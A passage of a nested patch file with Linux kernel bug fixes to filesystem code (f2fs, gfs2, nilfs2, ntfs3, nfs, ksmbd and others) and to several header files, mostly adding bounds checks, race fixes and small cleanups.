++			if (is_bad_inode(inode) ||
++					special_file(inode->i_mode)) {
++				iput(inode);
++				continue;
++			}
++
+ 			err = f2fs_gc_pinned_control(inode, gc_type, segno);
+ 			if (err == -EAGAIN) {
+ 				iput(inode);
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index 328cd20b16a54..6dcc73ca32172 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -970,7 +970,7 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	/*
+ 	 * If new_inode is null, the below renaming flow will
+-	 * add a link in old_dir which can conver inline_dir.
++	 * add a link in old_dir which can convert inline_dir.
+ 	 * After then, if we failed to get the entry due to other
+ 	 * reasons like ENOMEM, we had to remove the new entry.
+ 	 * Instead of adding such the error handling routine, let's
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index fcf22a50ff5db..745ecf5523c9b 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -1307,6 +1307,7 @@ struct page *f2fs_new_node_page(struct dnode_of_data *dn, unsigned int ofs)
+ 	}
+ 	if (unlikely(new_ni.blk_addr != NULL_ADDR)) {
+ 		err = -EFSCORRUPTED;
++		dec_valid_node_count(sbi, dn->inode, !ofs);
+ 		set_sbi_flag(sbi, SBI_NEED_FSCK);
+ 		f2fs_handle_error(sbi, ERROR_INVALID_BLKADDR);
+ 		goto fail;
+@@ -1333,7 +1334,6 @@ struct page *f2fs_new_node_page(struct dnode_of_data *dn, unsigned int ofs)
+ 	if (ofs == 0)
+ 		inc_valid_inode_count(sbi);
+ 	return page;
+-
+ fail:
+ 	clear_node_page_dirty(page);
+ 	f2fs_put_page(page, 1);
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 205216c1db91f..e19b569d938d8 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -3615,7 +3615,7 @@ void f2fs_wait_on_page_writeback(struct page *page,
+ 
+ 		/* submit cached LFS IO */
+ 		f2fs_submit_merged_write_cond(sbi, NULL, page, 0, type);
+-		/* sbumit cached IPU IO */
++		/* submit cached IPU IO */
+ 		f2fs_submit_merged_ipu_write(sbi, NULL, page);
+ 		if (ordered) {
+ 			wait_on_page_writeback(page);
+diff --git a/fs/gfs2/glock.c b/fs/gfs2/glock.c
+index 235a0948f6cc6..95353982e643a 100644
+--- a/fs/gfs2/glock.c
++++ b/fs/gfs2/glock.c
+@@ -855,11 +855,13 @@ __acquires(&gl->gl_lockref.lock)
+ 	}
+ 
+ 	if (sdp->sd_lockstruct.ls_ops->lm_lock)	{
++		struct lm_lockstruct *ls = &sdp->sd_lockstruct;
++
+ 		/* lock_dlm */
+ 		ret = sdp->sd_lockstruct.ls_ops->lm_lock(gl, target, lck_flags);
+ 		if (ret == -EINVAL && gl->gl_target == LM_ST_UNLOCKED &&
+ 		    target == LM_ST_UNLOCKED &&
+-		    test_bit(SDF_SKIP_DLM_UNLOCK, &sdp->sd_flags)) {
++		    test_bit(DFL_UNMOUNT, &ls->ls_recover_flags)) {
+ 			finish_xmote(gl, target);
+ 			gfs2_glock_queue_work(gl, 0);
+ 		} else if (ret) {
+diff --git a/fs/gfs2/glops.c b/fs/gfs2/glops.c
+index 7762483f5f20f..91a542b9d81e8 100644
+--- a/fs/gfs2/glops.c
++++ b/fs/gfs2/glops.c
+@@ -82,6 +82,9 @@ static void __gfs2_ail_flush(struct gfs2_glock *gl, bool fsync,
+ 	GLOCK_BUG_ON(gl, !fsync && atomic_read(&gl->gl_ail_count));
+ 	spin_unlock(&sdp->sd_ail_lock);
+ 	gfs2_log_unlock(sdp);
++
++	if (gfs2_withdrawing(sdp))
++		gfs2_withdraw(sdp);
+ }
+ 
+ 
+diff --git a/fs/gfs2/util.c b/fs/gfs2/util.c
+index 7a6aeffcdf5ca..48c69aa60cd17 100644
+--- a/fs/gfs2/util.c
++++ b/fs/gfs2/util.c
+@@ -359,7 +359,6 @@ int gfs2_withdraw(struct gfs2_sbd *sdp)
+ 			fs_err(sdp, "telling LM to unmount\n");
+ 			lm->lm_unmount(sdp);
+ 		}
+-		set_bit(SDF_SKIP_DLM_UNLOCK, &sdp->sd_flags);
+ 		fs_err(sdp, "File system withdrawn\n");
+ 		dump_stack();
+ 		clear_bit(SDF_WITHDRAW_IN_PROG, &sdp->sd_flags);
+diff --git a/fs/jffs2/xattr.c b/fs/jffs2/xattr.c
+index acb4492f5970c..5a31220f96f5f 100644
+--- a/fs/jffs2/xattr.c
++++ b/fs/jffs2/xattr.c
+@@ -1111,6 +1111,9 @@ int do_jffs2_setxattr(struct inode *inode, int xprefix, const char *xname,
+ 		return rc;
+ 
+ 	request = PAD(sizeof(struct jffs2_raw_xattr) + strlen(xname) + 1 + size);
++	if (request > c->sector_size - c->cleanmarker_size)
++		return -ERANGE;
++
+ 	rc = jffs2_reserve_space(c, request, &length,
+ 				 ALLOC_NORMAL, JFFS2_SUMMARY_XATTR_SIZE);
+ 	if (rc) {
+diff --git a/fs/nfs/filelayout/filelayout.c b/fs/nfs/filelayout/filelayout.c
+index 4974cd18ca468..b363e1bdacdac 100644
+--- a/fs/nfs/filelayout/filelayout.c
++++ b/fs/nfs/filelayout/filelayout.c
+@@ -881,7 +881,7 @@ filelayout_pg_init_read(struct nfs_pageio_descriptor *pgio,
+ 						      NFS4_MAX_UINT64,
+ 						      IOMODE_READ,
+ 						      false,
+-						      GFP_KERNEL);
++						      nfs_io_gfp_mask());
+ 		if (IS_ERR(pgio->pg_lseg)) {
+ 			pgio->pg_error = PTR_ERR(pgio->pg_lseg);
+ 			pgio->pg_lseg = NULL;
+@@ -905,7 +905,7 @@ filelayout_pg_init_write(struct nfs_pageio_descriptor *pgio,
+ 						      NFS4_MAX_UINT64,
+ 						      IOMODE_RW,
+ 						      false,
+-						      GFP_NOFS);
++						      nfs_io_gfp_mask());
+ 		if (IS_ERR(pgio->pg_lseg)) {
+ 			pgio->pg_error = PTR_ERR(pgio->pg_lseg);
+ 			pgio->pg_lseg = NULL;
+diff --git a/fs/nfs/fs_context.c b/fs/nfs/fs_context.c
+index 9bcd53d5c7d46..9a5b735e74f9e 100644
+--- a/fs/nfs/fs_context.c
++++ b/fs/nfs/fs_context.c
+@@ -1047,9 +1047,12 @@ static int nfs23_parse_monolithic(struct fs_context *fc,
+ 		ctx->acdirmax	= data->acdirmax;
+ 		ctx->need_mount	= false;
+ 
+-		memcpy(sap, &data->addr, sizeof(data->addr));
+-		ctx->nfs_server.addrlen = sizeof(data->addr);
+-		ctx->nfs_server.port = ntohs(data->addr.sin_port);
++		if (!is_remount_fc(fc)) {
++			memcpy(sap, &data->addr, sizeof(data->addr));
++			ctx->nfs_server.addrlen = sizeof(data->addr);
++			ctx->nfs_server.port = ntohs(data->addr.sin_port);
++		}
++
+ 		if (sap->ss_family != AF_INET ||
+ 		    !nfs_verify_server_address(sap))
+ 			goto out_no_address;
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index 457b2b2f804ab..2b19ddc2c39ad 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -2113,6 +2113,7 @@ static int nfs4_try_migration(struct nfs_server *server, const struct cred *cred
+ {
+ 	struct nfs_client *clp = server->nfs_client;
+ 	struct nfs4_fs_locations *locations = NULL;
++	struct nfs_fattr *fattr;
+ 	struct inode *inode;
+ 	struct page *page;
+ 	int status, result;
+@@ -2122,19 +2123,16 @@ static int nfs4_try_migration(struct nfs_server *server, const struct cred *cred
+ 			(unsigned long long)server->fsid.minor,
+ 			clp->cl_hostname);
+ 
+-	result = 0;
+ 	page = alloc_page(GFP_KERNEL);
+ 	locations = kmalloc(sizeof(struct nfs4_fs_locations), GFP_KERNEL);
+-	if (page == NULL || locations == NULL) {
+-		dprintk("<-- %s: no memory\n", __func__);
+-		goto out;
+-	}
+-	locations->fattr = nfs_alloc_fattr();
+-	if (locations->fattr == NULL) {
++	fattr = nfs_alloc_fattr();
++	if (page == NULL || locations == NULL || fattr == NULL) {
+ 		dprintk("<-- %s: no memory\n", __func__);
++		result = 0;
+ 		goto out;
+ 	}
+ 
++	locations->fattr = fattr;
+ 	inode = d_inode(server->super->s_root);
+ 	result = nfs4_proc_get_locations(server, NFS_FH(inode), locations,
+ 					 page, cred);
+diff --git a/fs/nilfs2/ioctl.c b/fs/nilfs2/ioctl.c
+index ef9f9a2511b72..1d4d610bd82b5 100644
+--- a/fs/nilfs2/ioctl.c
++++ b/fs/nilfs2/ioctl.c
+@@ -60,7 +60,7 @@ static int nilfs_ioctl_wrap_copy(struct the_nilfs *nilfs,
+ 	if (argv->v_nmembs == 0)
+ 		return 0;
+ 
+-	if (argv->v_size > PAGE_SIZE)
++	if ((size_t)argv->v_size > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	/*
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 0a84613960dbf..006df4eac9fab 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2207,19 +2207,36 @@ static int nilfs_segctor_sync(struct nilfs_sc_info *sci)
+ 	struct nilfs_segctor_wait_request wait_req;
+ 	int err = 0;
+ 
+-	spin_lock(&sci->sc_state_lock);
+ 	init_wait(&wait_req.wq);
+ 	wait_req.err = 0;
+ 	atomic_set(&wait_req.done, 0);
++	init_waitqueue_entry(&wait_req.wq, current);
++
++	/*
++	 * To prevent a race issue where completion notifications from the
++	 * log writer thread are missed, increment the request sequence count
++	 * "sc_seq_request" and insert a wait queue entry using the current
++	 * sequence number into the "sc_wait_request" queue at the same time
++	 * within the lock section of "sc_state_lock".
++	 */
++	spin_lock(&sci->sc_state_lock);
+ 	wait_req.seq = ++sci->sc_seq_request;
++	add_wait_queue(&sci->sc_wait_request, &wait_req.wq);
+ 	spin_unlock(&sci->sc_state_lock);
+ 
+-	init_waitqueue_entry(&wait_req.wq, current);
+-	add_wait_queue(&sci->sc_wait_request, &wait_req.wq);
+-	set_current_state(TASK_INTERRUPTIBLE);
+ 	wake_up(&sci->sc_wait_daemon);
+ 
+ 	for (;;) {
++		set_current_state(TASK_INTERRUPTIBLE);
++
++		/*
++		 * Synchronize only while the log writer thread is alive.
++		 * Leave flushing out after the log writer thread exits to
++		 * the cleanup work in nilfs_segctor_destroy().
++		 */
++		if (!sci->sc_task)
++			break;
++
+ 		if (atomic_read(&wait_req.done)) {
+ 			err = wait_req.err;
+ 			break;
+@@ -2235,7 +2252,7 @@ static int nilfs_segctor_sync(struct nilfs_sc_info *sci)
+ 	return err;
+ }
+ 
+-static void nilfs_segctor_wakeup(struct nilfs_sc_info *sci, int err)
++static void nilfs_segctor_wakeup(struct nilfs_sc_info *sci, int err, bool force)
+ {
+ 	struct nilfs_segctor_wait_request *wrq, *n;
+ 	unsigned long flags;
+@@ -2243,7 +2260,7 @@ static void nilfs_segctor_wakeup(struct nilfs_sc_info *sci, int err)
+ 	spin_lock_irqsave(&sci->sc_wait_request.lock, flags);
+ 	list_for_each_entry_safe(wrq, n, &sci->sc_wait_request.head, wq.entry) {
+ 		if (!atomic_read(&wrq->done) &&
+-		    nilfs_cnt32_ge(sci->sc_seq_done, wrq->seq)) {
++		    (force || nilfs_cnt32_ge(sci->sc_seq_done, wrq->seq))) {
+ 			wrq->err = err;
+ 			atomic_set(&wrq->done, 1);
+ 		}
+@@ -2381,7 +2398,7 @@ static void nilfs_segctor_notify(struct nilfs_sc_info *sci, int mode, int err)
+ 	if (mode == SC_LSEG_SR) {
+ 		sci->sc_state &= ~NILFS_SEGCTOR_COMMIT;
+ 		sci->sc_seq_done = sci->sc_seq_accepted;
+-		nilfs_segctor_wakeup(sci, err);
++		nilfs_segctor_wakeup(sci, err, false);
+ 		sci->sc_flush_request = 0;
+ 	} else {
+ 		if (mode == SC_FLUSH_FILE)
+@@ -2763,6 +2780,13 @@ static void nilfs_segctor_destroy(struct nilfs_sc_info *sci)
+ 		|| sci->sc_seq_request != sci->sc_seq_done);
+ 	spin_unlock(&sci->sc_state_lock);
+ 
++	/*
++	 * Forcibly wake up tasks waiting in nilfs_segctor_sync(), which can
++	 * be called from delayed iput() via nilfs_evict_inode() and can race
++	 * with the above log writer thread termination.
++	 */
++	nilfs_segctor_wakeup(sci, 0, true);
++
+ 	if (flush_work(&sci->sc_iput_work))
+ 		flag = true;
+ 
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index 72cdfa8727d3c..98f57d0c702eb 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -475,6 +475,7 @@ static int ntfs_readdir(struct file *file, struct dir_context *ctx)
+ 		vbo = (u64)bit << index_bits;
+ 		if (vbo >= i_size) {
+ 			ntfs_inode_err(dir, "Looks like your dir is corrupt");
++			ctx->pos = eod;
+ 			err = -EINVAL;
+ 			goto out;
+ 		}
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index d53ef128fa733..a2d5b2a94d854 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -1181,7 +1181,8 @@ static int read_log_page(struct ntfs_log *log, u32 vbo,
+ static int log_read_rst(struct ntfs_log *log, u32 l_size, bool first,
+ 			struct restart_info *info)
+ {
+-	u32 skip, vbo;
++	u32 skip;
++	u64 vbo;
+ 	struct RESTART_HDR *r_page = NULL;
+ 
+ 	/* Determine which restart area we are looking for. */
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index eee01db6e0cc5..730629235ffa1 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -1531,6 +1531,11 @@ static int indx_add_allocate(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 		goto out1;
+ 	}
+ 
++	if (data_size <= le64_to_cpu(alloc->nres.data_size)) {
++		/* Reuse index. */
++		goto out;
++	}
++
+ 	/* Increase allocation. */
+ 	err = attr_set_size(ni, ATTR_ALLOC, in->name, in->name_len,
+ 			    &indx->alloc_run, data_size, &data_size, true,
+@@ -1541,6 +1546,7 @@ static int indx_add_allocate(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 		goto out1;
+ 	}
+ 
++out:
+ 	*vbn = bit << indx->idx2vbn_bits;
+ 
+ 	return 0;
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 42dd9fdaf4151..2c8c32d9fcaa1 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -37,7 +37,7 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 	bool is_dir;
+ 	unsigned long ino = inode->i_ino;
+ 	u32 rp_fa = 0, asize, t32;
+-	u16 roff, rsize, names = 0;
++	u16 roff, rsize, names = 0, links = 0;
+ 	const struct ATTR_FILE_NAME *fname = NULL;
+ 	const struct INDEX_ROOT *root;
+ 	struct REPARSE_DATA_BUFFER rp; // 0x18 bytes
+@@ -190,11 +190,12 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 		    rsize < SIZEOF_ATTRIBUTE_FILENAME)
+ 			goto out;
+ 
++		names += 1;
+ 		fname = Add2Ptr(attr, roff);
+ 		if (fname->type == FILE_NAME_DOS)
+ 			goto next_attr;
+ 
+-		names += 1;
++		links += 1;
+ 		if (name && name->len == fname->name_len &&
+ 		    !ntfs_cmp_names_cpu(name, (struct le_str *)&fname->name_len,
+ 					NULL, false))
+@@ -421,7 +422,7 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 		ni->mi.dirty = true;
+ 	}
+ 
+-	set_nlink(inode, names);
++	set_nlink(inode, links);
+ 
+ 	if (S_ISDIR(mode)) {
+ 		ni->std_fa |= FILE_ATTRIBUTE_DIRECTORY;
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index ba26a465b3091..324c0b036fdc1 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -59,7 +59,7 @@ struct GUID {
+ struct cpu_str {
+ 	u8 len;
+ 	u8 unused;
+-	u16 name[10];
++	u16 name[];
+ };
+ 
+ struct le_str {
+diff --git a/fs/ntfs3/record.c b/fs/ntfs3/record.c
+index a8d4ed7bca025..1351fb02e1401 100644
+--- a/fs/ntfs3/record.c
++++ b/fs/ntfs3/record.c
+@@ -485,16 +485,9 @@ bool mi_remove_attr(struct ntfs_inode *ni, struct mft_inode *mi,
+ 	if (aoff + asize > used)
+ 		return false;
+ 
+-	if (ni && is_attr_indexed(attr)) {
++	if (ni && is_attr_indexed(attr) && attr->type == ATTR_NAME) {
+ 		u16 links = le16_to_cpu(ni->mi.mrec->hard_links);
+-		struct ATTR_FILE_NAME *fname =
+-			attr->type != ATTR_NAME ?
+-				NULL :
+-				resident_data_ex(attr,
+-						 SIZEOF_ATTRIBUTE_FILENAME);
+-		if (fname && fname->type == FILE_NAME_DOS) {
+-			/* Do not decrease links count deleting DOS name. */
+-		} else if (!links) {
++		if (!links) {
+ 			/* minor error. Not critical. */
+ 		} else {
+ 			ni->mi.mrec->hard_links = cpu_to_le16(links - 1);
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index 6066eea3f61cb..ab0711185b3d5 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -1453,8 +1453,6 @@ static int __init init_ntfs_fs(void)
+ {
+ 	int err;
+ 
+-	pr_info("ntfs3: Max link count %u\n", NTFS_LINK_MAX);
+-
+ 	if (IS_ENABLED(CONFIG_NTFS3_FS_POSIX_ACL))
+ 		pr_info("ntfs3: Enabled Linux POSIX ACLs support\n");
+ 	if (IS_ENABLED(CONFIG_NTFS3_64BIT_CLUSTER))
+diff --git a/fs/openpromfs/inode.c b/fs/openpromfs/inode.c
+index f0b7f4d51a175..0a2b0b4a8361e 100644
+--- a/fs/openpromfs/inode.c
++++ b/fs/openpromfs/inode.c
+@@ -355,10 +355,10 @@ static struct inode *openprom_iget(struct super_block *sb, ino_t ino)
+ 	return inode;
+ }
+ 
+-static int openprom_remount(struct super_block *sb, int *flags, char *data)
++static int openpromfs_reconfigure(struct fs_context *fc)
+ {
+-	sync_filesystem(sb);
+-	*flags |= SB_NOATIME;
++	sync_filesystem(fc->root->d_sb);
++	fc->sb_flags |= SB_NOATIME;
+ 	return 0;
+ }
+ 
+@@ -366,7 +366,6 @@ static const struct super_operations openprom_sops = {
+ 	.alloc_inode	= openprom_alloc_inode,
+ 	.free_inode	= openprom_free_inode,
+ 	.statfs		= simple_statfs,
+-	.remount_fs	= openprom_remount,
+ };
+ 
+ static int openprom_fill_super(struct super_block *s, struct fs_context *fc)
+@@ -416,6 +415,7 @@ static int openpromfs_get_tree(struct fs_context *fc)
+ 
+ static const struct fs_context_operations openpromfs_context_ops = {
+ 	.get_tree	= openpromfs_get_tree,
++	.reconfigure	= openpromfs_reconfigure,
+ };
+ 
+ static int openpromfs_init_fs_context(struct fs_context *fc)
+diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c
+index 5339ff08bd0f4..582d4bd50a1fb 100644
+--- a/fs/overlayfs/dir.c
++++ b/fs/overlayfs/dir.c
+@@ -327,9 +327,6 @@ static int ovl_create_upper(struct dentry *dentry, struct inode *inode,
+ 	struct dentry *newdentry;
+ 	int err;
+ 
+-	if (!attr->hardlink && !IS_POSIXACL(udir))
+-		attr->mode &= ~current_umask();
+-
+ 	inode_lock_nested(udir, I_MUTEX_PARENT);
+ 	newdentry = ovl_create_real(ofs, udir,
+ 				    ovl_lookup_upper(ofs, dentry->d_name.name,
+diff --git a/fs/smb/server/mgmt/share_config.c b/fs/smb/server/mgmt/share_config.c
+index a2f0a2edceb8a..e0a6b758094fc 100644
+--- a/fs/smb/server/mgmt/share_config.c
++++ b/fs/smb/server/mgmt/share_config.c
+@@ -165,8 +165,12 @@ static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+ 
+ 		share->path = kstrndup(ksmbd_share_config_path(resp), path_len,
+ 				      GFP_KERNEL);
+-		if (share->path)
++		if (share->path) {
+ 			share->path_sz = strlen(share->path);
++			while (share->path_sz > 1 &&
++			       share->path[share->path_sz - 1] == '/')
++				share->path[--share->path_sz] = '\0';
++		}
+ 		share->create_mask = resp->create_mask;
+ 		share->directory_mask = resp->directory_mask;
+ 		share->force_create_mode = resp->force_create_mode;
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index 1b98796499d78..b29e78b517bf0 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -613,19 +613,24 @@ static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
+ 		if (opinfo->op_state == OPLOCK_CLOSING)
+ 			return -ENOENT;
+ 		else if (opinfo->level <= req_op_level) {
+-			if (opinfo->is_lease &&
+-			    opinfo->o_lease->state !=
+-			     (SMB2_LEASE_HANDLE_CACHING_LE |
+-			      SMB2_LEASE_READ_CACHING_LE))
++			if (opinfo->is_lease == false)
++				return 1;
++
++			if (opinfo->o_lease->state !=
++			    (SMB2_LEASE_HANDLE_CACHING_LE |
++			     SMB2_LEASE_READ_CACHING_LE))
+ 				return 1;
+ 		}
+ 	}
+ 
+ 	if (opinfo->level <= req_op_level) {
+-		if (opinfo->is_lease &&
+-		    opinfo->o_lease->state !=
+-		     (SMB2_LEASE_HANDLE_CACHING_LE |
+-		      SMB2_LEASE_READ_CACHING_LE)) {
++		if (opinfo->is_lease == false) {
++			wake_up_oplock_break(opinfo);
++			return 1;
++		}
++		if (opinfo->o_lease->state !=
++		    (SMB2_LEASE_HANDLE_CACHING_LE |
++		     SMB2_LEASE_READ_CACHING_LE)) {
+ 			wake_up_oplock_break(opinfo);
+ 			return 1;
+ 		}
+diff --git a/include/drm/display/drm_dp_helper.h b/include/drm/display/drm_dp_helper.h
+index ade9df59e156a..59b191de14d61 100644
+--- a/include/drm/display/drm_dp_helper.h
++++ b/include/drm/display/drm_dp_helper.h
+@@ -436,9 +436,15 @@ struct drm_dp_aux {
+ 	 * @is_remote: Is this AUX CH actually using sideband messaging.
+ 	 */
+ 	bool is_remote;
++
++	/**
++	 * @powered_down: If true then the remote endpoint is powered down.
++	 */
++	bool powered_down;
+ };
+ 
+ int drm_dp_dpcd_probe(struct drm_dp_aux *aux, unsigned int offset);
++void drm_dp_dpcd_set_powered(struct drm_dp_aux *aux, bool powered);
+ ssize_t drm_dp_dpcd_read(struct drm_dp_aux *aux, unsigned int offset,
+ 			 void *buffer, size_t size);
+ ssize_t drm_dp_dpcd_write(struct drm_dp_aux *aux, unsigned int offset,
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 31171914990a3..66a7e01c62608 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -244,9 +244,9 @@ int mipi_dsi_shutdown_peripheral(struct mipi_dsi_device *dsi);
+ int mipi_dsi_turn_on_peripheral(struct mipi_dsi_device *dsi);
+ int mipi_dsi_set_maximum_return_packet_size(struct mipi_dsi_device *dsi,
+ 					    u16 value);
+-ssize_t mipi_dsi_compression_mode(struct mipi_dsi_device *dsi, bool enable);
+-ssize_t mipi_dsi_picture_parameter_set(struct mipi_dsi_device *dsi,
+-				       const struct drm_dsc_picture_parameter_set *pps);
++int mipi_dsi_compression_mode(struct mipi_dsi_device *dsi, bool enable);
++int mipi_dsi_picture_parameter_set(struct mipi_dsi_device *dsi,
++				   const struct drm_dsc_picture_parameter_set *pps);
+ 
+ ssize_t mipi_dsi_generic_write(struct mipi_dsi_device *dsi, const void *payload,
+ 			       size_t size);
+diff --git a/include/linux/acpi.h b/include/linux/acpi.h
+index 3015235d65e31..e4e7b2cfe72af 100644
+--- a/include/linux/acpi.h
++++ b/include/linux/acpi.h
+@@ -582,8 +582,8 @@ acpi_status acpi_run_osc(acpi_handle handle, struct acpi_osc_context *context);
+ #define OSC_SB_PCLPI_SUPPORT			0x00000080
+ #define OSC_SB_OSLPI_SUPPORT			0x00000100
+ #define OSC_SB_CPC_DIVERSE_HIGH_SUPPORT		0x00001000
+-#define OSC_SB_GENERIC_INITIATOR_SUPPORT	0x00002000
+ #define OSC_SB_CPC_FLEXIBLE_ADR_SPACE		0x00004000
++#define OSC_SB_GENERIC_INITIATOR_SUPPORT	0x00020000
+ #define OSC_SB_NATIVE_USB4_SUPPORT		0x00040000
+ #define OSC_SB_PRM_SUPPORT			0x00200000
+ 
+diff --git a/include/linux/bitops.h b/include/linux/bitops.h
+index 2ba557e067fe6..f7f5a783da2aa 100644
+--- a/include/linux/bitops.h
++++ b/include/linux/bitops.h
+@@ -80,6 +80,7 @@ __check_bitop_pr(__test_and_set_bit);
+ __check_bitop_pr(__test_and_clear_bit);
+ __check_bitop_pr(__test_and_change_bit);
+ __check_bitop_pr(test_bit);
++__check_bitop_pr(test_bit_acquire);
+ 
+ #undef __check_bitop_pr
+ 
+diff --git a/include/linux/counter.h b/include/linux/counter.h
+index b63746637de2a..246711b76e548 100644
+--- a/include/linux/counter.h
++++ b/include/linux/counter.h
+@@ -359,7 +359,6 @@ struct counter_ops {
+  * @num_counts:		number of Counts specified in @counts
+  * @ext:		optional array of Counter device extensions
+  * @num_ext:		number of Counter device extensions specified in @ext
+- * @priv:		optional private data supplied by driver
+  * @dev:		internal device structure
+  * @chrdev:		internal character device structure
+  * @events_list:	list of current watching Counter events
+diff --git a/include/linux/dev_printk.h b/include/linux/dev_printk.h
+index 8904063d4c9f0..65eec5be8ccb9 100644
+--- a/include/linux/dev_printk.h
++++ b/include/linux/dev_printk.h
+@@ -129,6 +129,16 @@ void _dev_info(const struct device *dev, const char *fmt, ...)
+ 		_dev_printk(level, dev, fmt, ##__VA_ARGS__);		\
+ 	})
+ 
++/*
++ * Dummy dev_printk for disabled debugging statements to use whilst maintaining
++ * gcc's format checking.
++ */
++#define dev_no_printk(level, dev, fmt, ...)				\
++	({								\
++		if (0)							\
++			_dev_printk(level, dev, fmt, ##__VA_ARGS__);	\
++	})
++
+ /*
+  * #defines for all the dev_<level> macros to prefix with whatever
+  * possible use of #define dev_fmt(fmt) ...
+@@ -158,10 +168,7 @@ void _dev_info(const struct device *dev, const char *fmt, ...)
+ 	dev_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__)
+ #else
+ #define dev_dbg(dev, fmt, ...)						\
+-({									\
+-	if (0)								\
+-		dev_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__); \
+-})
++	dev_no_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__)
+ #endif
+ 
+ #ifdef CONFIG_PRINTK
+@@ -247,20 +254,14 @@ do {									\
+ } while (0)
+ #else
+ #define dev_dbg_ratelimited(dev, fmt, ...)				\
+-do {									\
+-	if (0)								\
+-		dev_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__); \
+-} while (0)
++	dev_no_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__)
+ #endif
+ 
+ #ifdef VERBOSE_DEBUG
+ #define dev_vdbg	dev_dbg
+ #else
+ #define dev_vdbg(dev, fmt, ...)						\
+-({									\
+-	if (0)								\
+-		dev_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__); \
+-})
++	dev_no_printk(KERN_DEBUG, dev, dev_fmt(fmt), ##__VA_ARGS__)
+ #endif
+ 
+ /*
+diff --git a/include/linux/fpga/fpga-region.h b/include/linux/fpga/fpga-region.h
+index 9d4d32909340a..5fbc05fe70a6b 100644
+--- a/include/linux/fpga/fpga-region.h
++++ b/include/linux/fpga/fpga-region.h
+@@ -36,6 +36,7 @@ struct fpga_region_info {
+  * @mgr: FPGA manager
+  * @info: FPGA image info
+  * @compat_id: FPGA region id for compatibility check.
++ * @ops_owner: module containing the get_bridges function
+  * @priv: private data
+  * @get_bridges: optional function to get bridges to a list
+  */
+@@ -46,6 +47,7 @@ struct fpga_region {
+ 	struct fpga_manager *mgr;
+ 	struct fpga_image_info *info;
+ 	struct fpga_compat_id *compat_id;
++	struct module *ops_owner;
+ 	void *priv;
+ 	int (*get_bridges)(struct fpga_region *region);
+ };
+@@ -58,12 +60,17 @@ fpga_region_class_find(struct device *start, const void *data,
+ 
+ int fpga_region_program_fpga(struct fpga_region *region);
+ 
++#define fpga_region_register_full(parent, info) \
++	__fpga_region_register_full(parent, info, THIS_MODULE)
+ struct fpga_region *
+-fpga_region_register_full(struct device *parent, const struct fpga_region_info *info);
++__fpga_region_register_full(struct device *parent, const struct fpga_region_info *info,
++			    struct module *owner);
+ 
++#define fpga_region_register(parent, mgr, get_bridges) \
++	__fpga_region_register(parent, mgr, get_bridges, THIS_MODULE)
+ struct fpga_region *
+-fpga_region_register(struct device *parent, struct fpga_manager *mgr,
+-		     int (*get_bridges)(struct fpga_region *));
++__fpga_region_register(struct device *parent, struct fpga_manager *mgr,
++		       int (*get_bridges)(struct fpga_region *), struct module *owner);
+ void fpga_region_unregister(struct fpga_region *region);
+ 
+ #endif /* _FPGA_REGION_H */
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index 93ec34a94b724..1cae12185cf04 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -850,6 +850,7 @@ struct mlx5_cmd_work_ent {
+ 	void		       *context;
+ 	int			idx;
+ 	struct completion	handling;
++	struct completion	slotted;
+ 	struct completion	done;
+ 	struct mlx5_cmd        *cmd;
+ 	struct work_struct	work;
+diff --git a/include/linux/numa.h b/include/linux/numa.h
+index 0f512c0aba54b..871e7babc2886 100644
+--- a/include/linux/numa.h
